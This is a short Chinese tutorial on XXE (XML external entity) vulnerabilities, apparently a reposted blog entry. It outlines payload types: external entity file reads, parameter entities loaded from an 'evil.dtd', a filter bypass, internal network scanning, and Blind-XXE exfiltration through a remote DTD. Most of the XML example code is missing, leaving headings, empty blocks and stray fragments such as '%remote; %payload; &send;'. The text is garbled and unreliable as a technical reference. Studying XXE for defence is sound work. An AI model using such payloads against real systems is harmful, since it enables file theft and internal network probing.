XXE漏洞

原文链接:http://wyb0.com/posts/xxe/

0x00 XXE

XXE漏洞是针对使用XML交互的Web应用程序的攻击方法

XML文件作为配置文件(spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛

0x01 XML格式

  



  
  
  
  
]>



Tom
John
Reminder
Hi,I’am John

0x02 内部声明与外部引用






0x03 XXE漏洞

  • 外部引用时可能会出现漏洞,几种payload:


]>
&xxe;


  %d;
]>
&b;

evil.dtd中的内容为:


&b;

evil.dtd中的内容为:
  • 简单绕过


  
]>

  &xxe;

  • 扫描内网



  • Blind-XXE


    
    %remote;   
    %payload;   
]>
&send;


">
  
  
      
    %remote;  
    %all;  
    %send;  
]>


">

Reference(侵删):

  • http://blog.csdn.net/u011721501/article/details/43775691

你可能感兴趣的:(XXE漏洞)